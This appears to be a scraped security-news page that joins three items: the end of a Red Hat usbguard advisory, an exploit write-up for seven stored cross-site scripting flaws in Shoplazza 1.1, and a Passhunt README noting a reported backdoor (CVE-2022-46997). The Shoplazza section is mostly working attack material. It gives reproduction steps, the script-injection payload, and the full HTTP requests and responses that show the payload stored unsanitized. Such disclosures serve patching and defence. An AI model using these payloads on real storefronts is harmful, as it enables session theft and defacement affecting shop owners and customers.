described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2058465 - CVE-2019-25058 usbguard: Fix unauthorized access via D-Bus

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
usbguard-1.0.0-10.el9_0.1.src.rpm

aarch64:  
usbguard-1.0.0-10.el9_0.1.aarch64.rpm  
usbguard-dbus-1.0.0-10.el9_0.1.aarch64.rpm  
usbguard-dbus-debuginfo-1.0.0-10.el9_0.1.aarch64.rpm  
usbguard-debuginfo-1.0.0-10.el9_0.1.aarch64.rpm  
usbguard-debugsource-1.0.0-10.el9_0.1.aarch64.rpm  
usbguard-notifier-1.0.0-10.el9_0.1.aarch64.rpm  
usbguard-notifier-debuginfo-1.0.0-10.el9_0.1.aarch64.rpm  
usbguard-tools-1.0.0-10.el9_0.1.aarch64.rpm  
usbguard-tools-debuginfo-1.0.0-10.el9_0.1.aarch64.rpm

noarch:  
usbguard-selinux-1.0.0-10.el9_0.1.noarch.rpm

ppc64le:  
usbguard-1.0.0-10.el9_0.1.ppc64le.rpm  
usbguard-dbus-1.0.0-10.el9_0.1.ppc64le.rpm  
usbguard-dbus-debuginfo-1.0.0-10.el9_0.1.ppc64le.rpm  
usbguard-debuginfo-1.0.0-10.el9_0.1.ppc64le.rpm  
usbguard-debugsource-1.0.0-10.el9_0.1.ppc64le.rpm  
usbguard-notifier-1.0.0-10.el9_0.1.ppc64le.rpm  
usbguard-notifier-debuginfo-1.0.0-10.el9_0.1.ppc64le.rpm  
usbguard-tools-1.0.0-10.el9_0.1.ppc64le.rpm  
usbguard-tools-debuginfo-1.0.0-10.el9_0.1.ppc64le.rpm

s390x:  
usbguard-1.0.0-10.el9_0.1.s390x.rpm  
usbguard-dbus-1.0.0-10.el9_0.1.s390x.rpm  
usbguard-dbus-debuginfo-1.0.0-10.el9_0.1.s390x.rpm  
usbguard-debuginfo-1.0.0-10.el9_0.1.s390x.rpm  
usbguard-debugsource-1.0.0-10.el9_0.1.s390x.rpm  
usbguard-notifier-1.0.0-10.el9_0.1.s390x.rpm  
usbguard-notifier-debuginfo-1.0.0-10.el9_0.1.s390x.rpm  
usbguard-tools-1.0.0-10.el9_0.1.s390x.rpm  
usbguard-tools-debuginfo-1.0.0-10.el9_0.1.s390x.rpm

x86_64:  
usbguard-1.0.0-10.el9_0.1.i686.rpm  
usbguard-1.0.0-10.el9_0.1.x86_64.rpm  
usbguard-dbus-1.0.0-10.el9_0.1.x86_64.rpm  
usbguard-dbus-debuginfo-1.0.0-10.el9_0.1.i686.rpm  
usbguard-dbus-debuginfo-1.0.0-10.el9_0.1.x86_64.rpm  
usbguard-debuginfo-1.0.0-10.el9_0.1.i686.rpm  
usbguard-debuginfo-1.0.0-10.el9_0.1.x86_64.rpm  
usbguard-debugsource-1.0.0-10.el9_0.1.i686.rpm  
usbguard-debugsource-1.0.0-10.el9_0.1.x86_64.rpm  
usbguard-notifier-1.0.0-10.el9_0.1.x86_64.rpm  
usbguard-notifier-debuginfo-1.0.0-10.el9_0.1.i686.rpm  
usbguard-notifier-debuginfo-1.0.0-10.el9_0.1.x86_64.rpm  
usbguard-tools-1.0.0-10.el9_0.1.x86_64.rpm  
usbguard-tools-debuginfo-1.0.0-10.el9_0.1.i686.rpm  
usbguard-tools-debuginfo-1.0.0-10.el9_0.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2019-25058  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5j97NzjgjWX9erEAQhTcBAAn6skhJsg8EMtazzw72y0ldFQKdb8HtpT  
0Nt/ybt7pYJSOEFISnpk6P8hHRBvJp2YTWRvxNvqpL0Ufjy+oBvzTBAVek/tq+S9  
n88m4/mh171G5ZD5aDmzdvyVihET9WgsdFRpS0DUmPSzOur/1gHDVpArYTPOJpLT  
RPuj0iF30nNRESWLNMfhnbjOuyH/r5Loo2dSo2/dpFnCm4wTMLnz1towOwdi6CoX  
MFxewAF402iiyTgZOlJh900SvR8Sr6MU5EQREYCYVIIwfVlQSi3r5aQABO3D8UUZ  
ZMr3LsJ4Qkg1x9QU1jSQ2q3pqI1ArljOda1ky56/weDkcSxcd1ctkowvvv0sU7wV  
FI185U0AtMBEvQYe/RdngFcSw8istKR0cLJOzAn54Gc8Ua010fPNgnMfVPmcE2YR  
ugbQjpIHmU2zeaGA6GbYayXpdoA+gigBQvTh6hED1rYOCbp7wAXDA1L7obMLiO99  
usY2yeu5qwP45OtFiMPEUJX8pgyiGnxDcrNKB8NY3SBa+51v6CCRQ5lO57hyu88x  
t6CRAJft4kHCJypht9pXHDHZyijwfdJtTZd2/2aA7Be92sZc3NUpywwuJpkkFQ+p  
9t/4SePMOpjh+ViZ+sUsEWxEnjnHUFbIEPseP9kFW5vbbOCrYfFxnwURQEWsX+60  
gAn5cQIpi/I=  
=PGpJ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8971-01

Shoplazza version 1.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Shoplazza 1.1 - Stored Cross Site Scripting# Exploit Author: Andrey Stoykov# Software Link: https://github.com/Shoplazza/LifeStyle# Version: 1.1# Tested on: Ubuntu 20.04Stored XSS #1:To reproduce do the following:1. Login as normal user account2. Browse "Blog Posts" -> "Manage Blogs" -> "Add Blog Post"3. Select "Title" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/admin/articles/2dc688b1-ac9e-46d7-8e56-57ded1d45bf5 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"article":{"id":"2dc688b1-ac9e-46d7-8e56-57ded1d45bf5","title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","content":"<p>\"><script>alert(3)</script></p>"[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: application/json; charset=utf-8[...]{"article":{"title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","published":true,"seo_title":"Title\"><script>alert(1)</script>"[...]// HTTP GET request to trigger XSS payloadGET /blog/titlescriptalert1script?st=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NzAzMzE5MzYsInN0b3JlX2lkIjo1MTA0NTksInVzZXJfaWQiOiI4NGY4Nzk4ZC03ZGQ1LTRlZGMtYjk3Yy02MWUwODk5ZjM2MDgifQ.9ybPJCtv6Lzf1BlDy-ipoGpXajtl75QdUKEnfj9L49I HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8[...]<meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no,viewport-fit=cover"><title>Title"><script>alert(1)</script></title><meta name="keywords" content="test1205">[...]Stored XSS #2:To reproduce do the following:1. Login as normal user account2. Browse "Products" -> "Create Product"3. Select "Subtitle" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPOST /admin/api/admin/v2_products HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"product":{"id":"","title":"Title","brief":"Subtitle\"><script>alert(1)</script>","description":"<p>Description</p>"[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: application/json; charset=utf-8[...]{"product":{"brief":"Subtitle\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e","category_id":"","collections[...]Stored XSS #3:To reproduce do the following:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Announcement"3. Select "Text" section and enter payload "><script>alert(1)</script>4. Select "Mobile Text" section and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442430617951435468/temp-template-datas/061cf44d-f20e-42f4-9cde-54a74f240fef/sections/announcement HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0// HTTP response showing unsanitized XSS payload{"section":{"type":"announcement","settings":{"enable_view_all":true},"blocks":[{"type":"announcement","settings":{"text":"Announcement\"><script>alert('Announcement')</script>","mobile_text":"Mobile Text\"><script>alert('Mobile Text')</script>\n","countdown_time":1,"link":null,"link_text":"Shop now"}},{"type":"announcement","settings":{"text":"Welcome to our store","mobile_text":"Welcome to our store","countdown_time":1,"link":null,"link_text":"Shop [...]Stored XSS #4:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Product" 3. Select "Subheading" and enter payload "><script>alert(1)</script>3. Select "Heading" and enter payload "><script>alert(1)</script>4. Select "Text" and enter payload "><script>alert(1)</script>5. Select "Button Text" and enter payload "><script>alert(1)</script>6. Select "Label" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442439399796402892/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664528667835 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"section":{"name":"feature_product","cname":{"en-US":"Feature Product","zh-CN":""},"category":{"en-US":"Promotion","zh-CN":""},"ccategory":{"en-US":"Promotion","zh-CN":""},"display":true,"blocks":[{"type":"Product","settings":{"auto_display":true,"subheading":"Products\"><script>alert('Product')</script>","heading":"Product_Subheading\"><script>alert('Product_Subheading')</script>","text":"Product_Text\"><script>alert('Product_Text')</script>","btn_text":"Button_Text\"><script>alert('Button_Text')</script>","label_text":"Label_Text\"><script>alert('Label_Text')</script>",[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: application/json; charset=UTF-8[...]{"section":{"name":"feature_product","cname":{"en-US":"Feature Product","zh-CN":""},"category":{"en-US":"Promotion","zh-CN":""},"ccategory":{"en-US":"Promotion","zh-CN":""},"display":true,"blocks":[{"type":"Product","settings":{"auto_display":true,"subheading":"Products\"><script>alert('Product')</script>","heading":"Product_Subheading\"><script>alert('Product_Subheading')</script>","text":"Product_Text\"><script>alert('Product_Text')</script>","btn_text":"Button_Text\"><script>alert('Button_Text')</script>","label_text":"Label_Text\"><script>alert('Label_Text')</script>"[...]Stored XSS #5:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Product Carousel" 3. Select "Heading" and enter payload "><script>alert(1)</script>4. Select "Description" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442439399796402892/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664529790755 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"section":{"name":"product_carousel","cname":{"en-US":"Products carousel","zh-CN":""},"category":{"en-US":"Product","zh-CN":""},"category":{"en-US":"Product","zh-CN":""},"icon":"oss/operation/cbff8870e3db05817270bcb0e8c52870.svg","display":true,"settings":{"heading":" Products Carousel\"><script>alert('Product Carousel')</script>","auto_display":true,"collection":null,"desc":"Product Description\"><script>alert('Product Description')</script>[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: application/json; charset=UTF-8[...]{"heading":" Products Carousel\"><script>alert('Product Carousel')</script>","auto_display":true,"collection":null,"desc":"Product Description\"><script>alert('Product Description')</script>"[...]\">Product Description\"><script>alert('Product Description')</script>[...]Stored XSS #6:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Text with Icons" -> "Free Shipping"3. Select "Heading" and enter payload "><script>alert(1)</script>4. Select "Text" and enter payload "><script>alert(1)</script>5. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Free Shipping" Worldwide Shipping"6. Select "Heading" and enter payload "><script>alert(1)</script>7. Select "Text" and enter payload "><script>alert(1)</script>8. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Member Discount"9. Select "Heading" and enter payload "><script>alert(1)</script>10. Select "Text" and enter payload "><script>alert(1)</script>11. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Icon"12. Select "Heading" and enter payload "><script>alert(1)</script>13. Select "Text" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442443380824229324/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664529794334 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"section":{"name":"icon_text","cname":{"zh-CN":"","en-US":"Text with icons"},"category":{"en-US":"Image with text","zh-CN":""},"ccategory":{"en-US":"Image with text","zh-CN":""},"icon":"oss/operation/b3117ddd140480a503655c157b1af934.svg","display":true,"blocks":[{"type":"icon","settings":{"icon":"free_shipping","heading":"Free shipping\"><script>alert('Free_Shipping')</script>","text":"Free worldwide shipping\"><script>alert('Free world wide shipping')</script>","link":""}},{"type":"icon","settings":{"icon":"customer_service","heading":"Free worldwide shipping\"><script>alert('Free worldwide shipping')</script>","text":"Text\"><script>alert('Text')</script>","link":""}},{"type":"icon","settings":{"icon":"secure_payment","heading":" Member Discount\"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>","text":"Short content about your store\"><script>alert('Short content about your store')</script>"[...]// HTTP response showing unsanitized XSS payload HTTP/1.1 200 OKContent-Type: application/json; charset=UTF-8[...]{"section":{"name":"icon_text","cname":{"zh-CN":"","en-US":"Text with icons"},"category":{"en-US":"Image with text","zh-CN":""},"ccategory":{"en-US":"Image with text","zh-CN":""},"icon":"oss/operation/b3117ddd140480a503655c157b1af934.svg","display":true,"blocks":[{"type":"icon","settings":{"icon":"free_shipping","heading":"Free shipping\"><script>alert('Free_Shipping')</script>","text":"Free worldwide shipping\"><script>alert('Free world wide shipping')</script>","link":""}},{"type":"icon","settings":{"icon":"customer_service","heading":"Free worldwide shipping\"><script>alert('Free worldwide shipping')</script>","text":"Text\"><script>alert('Text')</script>","link":""}},{"type":"icon","settings":{"icon":"secure_payment","heading":" Member Discount\"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>"[...]"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>","text":"Short content about your store\"><script>alert('Short content about your store')</script>[...]Stored XSS #7:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Review Flow"3. Select "Title" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442443380824229324/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1670588315547 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"section":{"name":{"en-US":"Review Flow","zh-CN":""},"type":"shoplazza://apps/internal-product-reviews-masonry/blocks/review/48597947633379239","settings":{"star_least":"5","with_photo":true,"show_product":true,"title":"Customer Review\"><script>alert('Customer Reviews')</script>[...]HTTP/1.1 200 OKContent-Type: application/json; charset=UTF-8[...]{"section":{"name":{"en-US":"Review Flow","zh-CN":""},"type":"shoplazza://apps/internal-product-reviews-masonry/blocks/review/48597947633379239","settings":{"star_least":"5","with_photo":true,"show_product":true,"title":"Customer Review\"><script>alert('Customer Reviews')</script>"[...]

Shoplazza 1.1 Cross Site Scripting

Passhunt commit 54eb987d30ead2b8ebbf1f0b880aa14249323867 was discovered to contain a code execution backdoor via the request package. This vulnerability allows attackers to access sensitive user information and digital currency keys, as well as escalate privileges.

**Passhunt**

Passhunt is a simple tool for searching of default credentials for network devices, web applications and more. Search through 523 vendors and their 2084 default passwords.

**Screenshot**

**Pre-requisites**

Make sure you have installed the following:

\- Python 3.0 or later.
- pip3 (sudo apt-get install python3-pip)

**How to install?**

git clone https://github.com/Viralmaniar/Passhunt.git
cd Passhunt
pip3 install -r requirements.txt
python3 Passhunt.py

**How do I use this?**

*   Press 1: This will print the list of supported vendors.
*   Press 2: Enter the vendor name and search for default credentials.
*   Press 3: To exit from the program.

**Credit**

The list of default passwords is obtained from cirt.net. All passwords and vendor list maintained by cirt.net

**TODO**

*   Offline password search
*   Create username and password list in a json file and parse them

CVE-2022-46997: GitHub - Viralmaniar/Passhunt: Passhunt is a simple tool for searching of default credentials for network devices, web applications and more. Search through 523 vendors and their 2084 default password

Tag

#js